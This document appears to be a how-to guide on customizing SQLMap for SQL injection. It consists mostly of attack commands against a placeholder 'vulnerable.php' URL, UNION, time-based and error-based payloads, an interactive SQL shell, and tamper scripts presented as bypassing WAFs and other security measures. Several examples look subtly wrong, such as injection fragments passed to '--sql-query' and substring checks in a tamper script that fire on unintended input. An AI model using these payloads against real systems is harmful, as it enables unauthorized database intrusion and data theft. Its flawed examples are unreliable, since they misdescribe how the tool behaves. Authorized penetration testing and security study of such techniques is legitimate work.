# Adding Custom Payloads Directly in SQLMap Syntax You can add custom payloads directly within the SQLMap syntax using the `--sql-query` option or by customizing the payloads through tamper scripts. Below, I will show you how to add custom payloads directly using SQLMap as well as through tamper scripts. ### Adding Custom Payloads Directly in SQLMap SQLMap allows you to specify your own SQL queries using the `--sql-query` option. This is particularly useful when you want to inject specific payloads to test for SQL injection. **Example: Using `--sql-query`** 1. **Simple Custom Payload** ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="SELECT version()" ``` 2. **Union-Based Custom Payload** ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="UNION SELECT null, database(), user(), version()" ``` ### Customizing Payloads with Tamper Scripts If you need more flexibility and want to systematically apply custom payloads, you can create a tamper script that modifies the default payloads used by SQLMap. **Example: Custom Tamper Script** 1. **Create a Custom Tamper Script** Create a new Python file in the `tamper` directory of your SQLMap installation, for example, `custom_payload_tamper.py`. ```python #!/usr/bin/env python import random __priority__ = 1 def dependencies(): pass def tamper(payload): """ Custom tamper script to inject custom payloads """ if payload: # Example of replacing spaces with comments and adding a custom payload payload = payload.replace(" ", "/**/") if "SELECT" in payload.upper(): payload = payload.replace("SELECT", "SELECT/**/custom_function(),") return payload ``` 2. **Save the Script** Save this script in the `tamper` directory of SQLMap. 3. **Use the Tamper Script with SQLMap** Run SQLMap with your custom tamper script to apply your modifications to the payloads. ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=custom_payload_tamper ``` ### Advanced Example with Multiple Payloads You can combine multiple payloads and tamper scripts to create more complex injection tests. Below is an advanced example where custom payloads are systematically applied to the requests. **Example: Combining Multiple Techniques** 1. **Create a Complex Tamper Script** ```python #!/usr/bin/env python import random __priority__ = 1 def dependencies(): pass def tamper(payload): """ Custom tamper script to apply multiple custom payloads """ if payload: payload = payload.replace(" ", "/**/") if "UNION" in payload.upper(): payload += " UNION SELECT null, user(), database(), version() --" if "AND" in payload.upper(): payload += " AND IF(1=1, SLEEP(5), 0) --" if "OR" in payload.upper(): payload += " OR (SELECT 1/0 FROM dual) --" return payload ``` 2. **Save and Use the Script** Save this script as `complex_tamper.py` in the `tamper` directory. 3. **Run SQLMap with the Complex Tamper Script** ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=complex_tamper ``` ### Leveraging SQLMap's `--sql-query` Option The `--sql-query` option allows you to directly specify SQL queries to be executed. This is useful for precise injection testing. **Examples: Custom Queries with `--sql-query`** 1. **Direct Version Query** This command checks the version of the database: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="SELECT version()" ``` 2. **Union-Based Query** This command retrieves multiple pieces of information such as the database name, current user, and database version: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="UNION SELECT null, database(), user(), version()" ``` 3. **Subquery Injection** This command uses a subquery to extract table names: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="SELECT (SELECT table_name FROM information_schema.tables LIMIT 1)" ``` ### Using `--sql-shell` for Interactive Injection SQLMap's `--sql-shell` provides an interactive SQL shell for executing arbitrary SQL commands. **Example: Starting SQL Shell** 1. **Interactive Shell** Start an interactive SQL shell to manually execute SQL commands: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-shell ``` 2. **Executing Commands in Shell** Execute commands in the SQL shell to retrieve information: ```sql sql-shell> SELECT user(); sql-shell> SELECT database(); sql-shell> SELECT table_name FROM information_schema.tables; ``` ### Creating Custom Tamper Scripts Tamper scripts can modify payloads dynamically to bypass WAFs and other security measures. **Example: Advanced Custom Tamper Script** 1. **Script to Add Random Comments** Create a script `random_comment_tamper.py`: ```python #!/usr/bin/env python import random __priority__ = 1 def dependencies(): pass def tamper(payload): """ Adds random inline comments to the payload """ if payload: parts = payload.split(" ") payload = " /*" + str(random.randint(1000, 9999)) + "*/ ".join(parts) return payload ``` 2. **Save and Use the Script** Save this script in the `tamper` directory of SQLMap and use it: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_comment_tamper ``` ### Custom Payloads with `--prefix` and `--suffix` You can use `--prefix` and `--suffix` to add custom SQL snippets before and after the payload. **Examples: Using `--prefix` and `--suffix`** 1. **Adding Prefix and Suffix** Add custom snippets before and after the payload: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --prefix="/**/SELECT/**/" --suffix="/**/FROM/**/dual" ``` 2. **Injecting with Custom Wrappers** Wrap the payload with custom conditions: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --prefix="' OR 1=1; /*" --suffix="*/ --" ``` ### Using SQLMap's `--eval` Option The `--eval` option allows for evaluating Python code before sending requests, which can be used for dynamic payload generation. **Example: Dynamic Payload Generation with `--eval`** 1. **Dynamic Generation** Generate a dynamic payload using Python code: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --eval="import random; id=random.randint(1,10)" ``` ### Combining Techniques for Automated Testing You can combine multiple techniques for comprehensive automated testing. **Example: Full Automated Test with Custom Payloads** 1. **Advanced Custom Payloads in Combination** Combine various methods to create a comprehensive testing command: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" \ --sql-query="UNION SELECT null, database(), user(), version()" \ --tamper=random_comment_tamper \ --prefix="' OR 1=1; /*" \ --suffix="*/ --" \ --level=5 --risk=3 ``` #### Example of an Advanced Tamper Script for Automated Testing **Example: Randomized Time-Based Injection** 1. **Script `random_time_tamper.py`** Create a script to add random time-based delays to the payload: ```python #!/usr/bin/env python import random __priority__ = 1 def dependencies(): pass def tamper(payload): """ Adds a random time-based delay to the payload """ if payload: delay = random.randint(1, 10) payload = payload.replace(" ", "/**/") + f" AND SLEEP({delay})" return payload ``` 2. **Use with SQLMap** Use the script with SQLMap: ```sh sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_time_tamper ```